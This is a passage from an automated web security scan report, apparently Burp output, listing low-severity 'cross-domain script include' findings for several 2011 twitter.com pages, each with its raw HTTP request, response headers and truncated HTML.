Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlMWUxNmY3YWFiZTFkMjk3MjM1NjU1ZjBkMzliNzg5%250AMTM6DnJldHVybl90byI2aHR0cDovL3R3aXR0ZXIuY29tLzdOZXdzL3N0YXR1%250Acy8yOTYxOTYwMDU1MTMxNzUwNDoHaWQiJTgzNTE4ZDU1NGI3NjIwMzE0Y2Ex%250AMWIzZGQ1MThmZjFlIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFz%250AaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIWLlGui0B--925e1e31fa9a3e0528e8a01d8e0ecb1f6fcb625d; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295646587/javascripts/twitter.js?1295653420" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295646587/javascripts/lib/jquery.tipsy.min.js?1295653420" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1295646587/javascripts/lib/gears_init.js?1295653420" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295653420" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1295646587/javascripts/geov1.js?1295653420" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295646587/javascripts/api.js?1295653420" type="text/javascript"></script>
...[SNIP]...

21.468. http://twitter.com/7news

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /7news

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://a0.twimg.com/a/1295646587/javascripts/dismissable.js?1295653420
  • http://a0.twimg.com/a/1295646587/javascripts/geov1.js?1295653420
  • http://a2.twimg.com/a/1295646587/javascripts/api.js?1295653420
  • http://a2.twimg.com/a/1295646587/javascripts/lib/gears_init.js?1295653420
  • http://a2.twimg.com/a/1295646587/javascripts/lib/jquery.tipsy.min.js?1295653420
  • http://a3.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295653420
  • http://a3.twimg.com/a/1295646587/javascripts/twitter.js?1295653420
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
  • http://www.google.com/jsapi

Request

GET /7news HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 23:05:49 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295910349-40880-22216
ETag: "edad7aa55a25b6aec0246521dae3ab7a"
Last-Modified: Mon, 24 Jan 2011 23:05:49 GMT
X-Runtime: 0.01998
Content-Type: text/html; charset=utf-8
Content-Length: 53571
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295910349075016; path=/; expires=Mon, 31-Jan-11 23:05:49 GMT; domain=.twitter.com
Set-Cookie: guest_id=129591034994189809; path=/; expires=Wed, 23 Feb 2011 23:05:49 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTAyYzE2NTMwZmE0YWY2ZTAyMTAxMDJmMGU0YTQzZmQ2Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsId6xGui0B--4e6b29308b59767c1b05d40af6b5c28ee7725ec0; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295646587/javascripts/twitter.js?1295653420" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295646587/javascripts/lib/jquery.tipsy.min.js?1295653420" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1295646587/javascripts/lib/gears_init.js?1295653420" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295653420" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1295646587/javascripts/geov1.js?1295653420" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295646587/javascripts/api.js?1295653420" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295653420" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1295646587/javascripts/dismissable.js?1295653420" type="text/javascript"></script>
...[SNIP]...

21.469. http://twitter.com/LizPW/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /LizPW/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://a0.twimg.com/a/1295646587/javascripts/dismissable.js?1295653420
  • http://a0.twimg.com/a/1295646587/javascripts/geov1.js?1295653420
  • http://a2.twimg.com/a/1295646587/javascripts/api.js?1295653420
  • http://a2.twimg.com/a/1295646587/javascripts/lib/gears_init.js?1295653420
  • http://a2.twimg.com/a/1295646587/javascripts/lib/jquery.tipsy.min.js?1295653420
  • http://a3.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295653420
  • http://a3.twimg.com/a/1295646587/javascripts/twitter.js?1295653420
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
  • http://www.google.com/jsapi

Request

GET /LizPW/ HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 23:10:21 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295910621-77895-31155
ETag: "c259f1b8d242bd50582934993f0c6970"
Last-Modified: Mon, 24 Jan 2011 23:10:21 GMT
X-Runtime: 0.01511
Content-Type: text/html; charset=utf-8
Content-Length: 51420
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295910621396653; path=/; expires=Mon, 31-Jan-11 23:10:21 GMT; domain=.twitter.com
Set-Cookie: guest_id=129591062196529909; path=/; expires=Wed, 23 Feb 2011 23:10:21 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWRlMWQ2NzdlN2Y2ZTU0NGM4ZWEyNTMyMWY1ZTk3YzU0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsID9NKui0B--e7abc610de60e62983759c4d12e8f2cf3eede5ed; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295646587/javascripts/twitter.js?1295653420" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295646587/javascripts/lib/jquery.tipsy.min.js?1295653420" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1295646587/javascripts/lib/gears_init.js?1295653420" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295653420" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1295646587/javascripts/geov1.js?1295653420" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295646587/javascripts/api.js?1295653420" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a3.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295653420" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1295646587/javascripts/dismissable.js?1295653420" type="text/javascript"></script>
...[SNIP]...

21.470. http://twitter.com/LizPW/status/29620929206165504

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /LizPW/status/29620929206165504

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://a0.twimg.com/a/1295646587/javascripts/api.js?1295901448
  • http://a0.twimg.com/a/1295646587/javascripts/lib/gears_init.js?1295901448
  • http://a0.twimg.com/a/1295646587/javascripts/lib/jquery.tipsy.min.js?1295901448
  • http://a1.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295901448
  • http://a1.twimg.com/a/1295646587/javascripts/twitter.js?1295901448
  • http://a2.twimg.com/a/1295646587/javascripts/geov1.js?1295901448
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
  • http://www.google.com/jsapi

Request

GET /LizPW/status/29620929206165504 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 23:10:09 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295910609-55052-61887
ETag: "f0d14c8ffca948984521cadb8828dc45"
Last-Modified: Mon, 24 Jan 2011 23:10:09 GMT
X-Runtime: 0.10628
Content-Type: text/html; charset=utf-8
Content-Length: 13847
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295910608056839; path=/; expires=Mon, 31-Jan-11 23:10:08 GMT; domain=.twitter.com
Set-Cookie: guest_id=129591060947951191; path=/; expires=Wed, 23 Feb 2011 23:10:09 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlZjIzZWFjODQ4ZTMwNGMwZmI1ZjZiYzg5NTZmMmY3%250AOTQ6DnJldHVybl90byI2aHR0cDovL3R3aXR0ZXIuY29tL0xpelBXL3N0YXR1%250Acy8yOTYyMDkyOTIwNjE2NTUwNDoHaWQiJTIzYjk5NTM3NmZiMjNlNTBiYWYw%250AZmUyZTUyM2MyNjFiIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFz%250AaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsISqJKui0B--b7721b8e7b4f79835b43a20e0bb17f7502fe2043; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1295646587/javascripts/twitter.js?1295901448" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1295646587/javascripts/lib/jquery.tipsy.min.js?1295901448" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1295646587/javascripts/lib/gears_init.js?1295901448" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295901448" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295646587/javascripts/geov1.js?1295901448" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1295646587/javascripts/api.js?1295901448" type="text/javascript"></script>
...[SNIP]...

21.471. http://twitter.com/cw56

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /cw56

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://a0.twimg.com/a/1295646587/javascripts/api.js?1295901448
  • http://a0.twimg.com/a/1295646587/javascripts/lib/gears_init.js?1295901448
  • http://a0.twimg.com/a/1295646587/javascripts/lib/jquery.tipsy.min.js?1295901448
  • http://a1.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295901448
  • http://a1.twimg.com/a/1295646587/javascripts/twitter.js?1295901448
  • http://a2.twimg.com/a/1295646587/javascripts/dismissable.js?1295901448
  • http://a2.twimg.com/a/1295646587/javascripts/geov1.js?1295901448
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
  • http://www.google.com/jsapi

Request

GET /cw56 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 23:06:46 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295910406-20060-45194
ETag: "ff97e4d20929a3ffbfd77d3c60c548db"
Last-Modified: Mon, 24 Jan 2011 23:06:46 GMT
X-Runtime: 0.00997
Content-Type: text/html; charset=utf-8
Content-Length: 55430
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295910405466703; path=/; expires=Mon, 31-Jan-11 23:06:45 GMT; domain=.twitter.com
Set-Cookie: guest_id=129591040641745365; path=/; expires=Wed, 23 Feb 2011 23:06:46 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWQwY2JkYzRhMmU2ZTBjZWZhNmNiYWE3MTYzNTNkNDVkIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIE4lHui0B--3cac94f8557ed984265e75e9f4c719f681987c10; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1295646587/javascripts/twitter.js?1295901448" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1295646587/javascripts/lib/jquery.tipsy.min.js?1295901448" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1295646587/javascripts/lib/gears_init.js?1295901448" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295901448" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295646587/javascripts/geov1.js?1295901448" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1295646587/javascripts/api.js?1295901448" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a1.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295901448" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295646587/javascripts/dismissable.js?1295901448" type="text/javascript"></script>
...[SNIP]...

21.472. http://twitter.com/datasift

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /datasift

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://a0.twimg.com/a/1295903943/javascripts/geov1.js?1295915292
  • http://a1.twimg.com/a/1295903943/javascripts/api.js?1295915292
  • http://a2.twimg.com/a/1295903943/javascripts/lib/gears_init.js?1295915292
  • http://a2.twimg.com/a/1295903943/javascripts/lib/jquery.tipsy.min.js?1295915292
  • http://a2.twimg.com/a/1295903943/javascripts/lib/mustache.js?1295915292
  • http://a3.twimg.com/a/1295903943/javascripts/dismissable.js?1295915292
  • http://a3.twimg.com/a/1295903943/javascripts/twitter.js?1295915292
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
  • http://www.google.com/jsapi

Request

GET /datasift HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 14:01:50 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295964110-52502-21616
ETag: "98dfab6f65418ae81b99a43c3a15ba6b"
Last-Modified: Tue, 25 Jan 2011 14:01:50 GMT
X-Runtime: 0.41713
Content-Type: text/html; charset=utf-8
Content-Length: 46413
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295964108154865; path=/; expires=Tue, 01-Feb-11 14:01:48 GMT; domain=.twitter.com
Set-Cookie: guest_id=129596411037165831; path=/; expires=Thu, 24 Feb 2011 14:01:50 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlNWEwYzM3OTNmYjE1ZjAwZDgyZTA4NTA1Y2ZiMGJh%250AZDU6DnJldHVybl90byIgaHR0cDovL3R3aXR0ZXIuY29tL2RhdGFzaWZ0Ogdp%250AZCIlNTM1ZTA1NTY3NDFkOGQ5Zjk2ZGQ2NjkwMWQ2NTA1NTciCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2Vk%250AewA6D2NyZWF0ZWRfYXRsKwgl%252Fnq9LQE%253D--53648523a8885e6e9f30528d0faecbf003a6ff95; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295903943/javascripts/twitter.js?1295915292" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295903943/javascripts/lib/jquery.tipsy.min.js?1295915292" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1295903943/javascripts/lib/gears_init.js?1295915292" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295903943/javascripts/lib/mustache.js?1295915292" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1295903943/javascripts/geov1.js?1295915292" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1295903943/javascripts/api.js?1295915292" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1295903943/javascripts/lib/mustache.js?1295915292" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295903943/javascripts/dismissable.js?1295915292" type="text/javascript"></script>
...[SNIP]...

21.473. http://twitter.com/goodies/tweetbutton

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /goodies/tweetbutton

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://a0.twimg.com/a/1295903943/javascripts/geov1.js?1295915292
  • http://a0.twimg.com/a/1295903943/javascripts/tweet_button.js?1295915292
  • http://a1.twimg.com/a/1295903943/javascripts/api.js?1295915292
  • http://a2.twimg.com/a/1295903943/javascripts/layout_newtwitter.js?1295915292
  • http://a2.twimg.com/a/1295903943/javascripts/lib/gears_init.js?1295915292
  • http://a2.twimg.com/a/1295903943/javascripts/lib/jquery.tipsy.min.js?1295915292
  • http://a2.twimg.com/a/1295903943/javascripts/lib/mustache.js?1295915292
  • http://a3.twimg.com/a/1295903943/javascripts/twitter.js?1295915292
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
  • http://www.google.com/jsapi

Request

GET /goodies/tweetbutton HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 14:01:41 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295964101-18603-26081
ETag: "a82d62223df18c75e7f04c910709daa8"
Last-Modified: Tue, 25 Jan 2011 14:01:41 GMT
X-Runtime: 0.06782
Content-Type: text/html; charset=utf-8
Content-Length: 16931
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295964099762702; path=/; expires=Tue, 01-Feb-11 14:01:39 GMT; domain=.twitter.com
Set-Cookie: guest_id=129596410159981042; path=/; expires=Thu, 24 Feb 2011 14:01:41 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlZTQ5NjQzODBhYWVkYzk2ZTk5YjBhZjc3Y2QzY2My%250AYjM6B2lkIiU1ZDJiYjViZjBmZjlhM2RiYmM3MDI4ODNjZDI3ZDY5YSIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCOHber0tAQ%253D%253D--6ec643070f608b03d4f820e3f2adac7676f7a3ca; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295903943/javascripts/twitter.js?1295915292" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295903943/javascripts/lib/jquery.tipsy.min.js?1295915292" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1295903943/javascripts/lib/gears_init.js?1295915292" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295903943/javascripts/lib/mustache.js?1295915292" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1295903943/javascripts/geov1.js?1295915292" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1295903943/javascripts/api.js?1295915292" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1295903943/javascripts/layout_newtwitter.js?1295915292" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://a0.twimg.com/a/1295903943/javascripts/tweet_button.js?1295915292" type="text/javascript"></script>
...[SNIP]...

21.474. http://twitter.com/joomla

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /joomla

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://a0.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295652732
  • http://a1.twimg.com/a/1295646587/javascripts/dismissable.js?1295652732
  • http://a1.twimg.com/a/1295646587/javascripts/geov1.js?1295652732
  • http://a1.twimg.com/a/1295646587/javascripts/twitter.js?1295652732
  • http://a3.twimg.com/a/1295646587/javascripts/api.js?1295652732
  • http://a3.twimg.com/a/1295646587/javascripts/lib/gears_init.js?1295652732
  • http://a3.twimg.com/a/1295646587/javascripts/lib/jquery.tipsy.min.js?1295652732
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
  • http://www.google.com/jsapi

Request

GET /joomla HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:38 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295884958-68881-31789
ETag: "ae3f2c47aa619b0820a141db6a6acfae"
Last-Modified: Mon, 24 Jan 2011 16:02:38 GMT
X-Runtime: 0.01322
Content-Type: text/html; charset=utf-8
Content-Length: 53726
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295884958395114; path=/; expires=Mon, 31-Jan-11 16:02:38 GMT; domain=.twitter.com
Set-Cookie: guest_id=129588495844059611; path=/; expires=Wed, 23 Feb 2011 16:02:38 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCOo6w7gtAToHaWQiJTFmN2YyYzU0MmRhYmY4%250AZWYyNDc4ZWFmY2M4MmYwNjIwIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--724d5a6fe81e3fe03c41751c53520bd5bc139e61; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1295646587/javascripts/twitter.js?1295652732" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295646587/javascripts/lib/jquery.tipsy.min.js?1295652732" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1295646587/javascripts/lib/gears_init.js?1295652732" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295652732" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1295646587/javascripts/geov1.js?1295652732" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295646587/javascripts/api.js?1295652732" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295652732" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1295646587/javascripts/dismissable.js?1295652732" type="text/javascript"></script>
...[SNIP]...

21.475. http://twitter.com/kontentdesign

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /kontentdesign

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://a0.twimg.com/a/1295903943/javascripts/dismissable.js?1295916547
  • http://a0.twimg.com/a/1295903943/javascripts/geov1.js?1295916547
  • http://a2.twimg.com/a/1295903943/javascripts/api.js?1295916547
  • http://a2.twimg.com/a/1295903943/javascripts/lib/gears_init.js?1295916547
  • http://a2.twimg.com/a/1295903943/javascripts/lib/jquery.tipsy.min.js?1295916547
  • http://a3.twimg.com/a/1295903943/javascripts/lib/mustache.js?1295916547
  • http://a3.twimg.com/a/1295903943/javascripts/twitter.js?1295916547
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
  • http://www.google.com/jsapi

Request

GET /kontentdesign HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 14:02:07 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295964127-50745-17441
ETag: "63815a5d05a1b95386102d34a0650082"
Last-Modified: Tue, 25 Jan 2011 14:02:07 GMT
X-Runtime: 0.01446
Content-Type: text/html; charset=utf-8
Content-Length: 52448
Pragma: no-cache
X-Revision: DEV
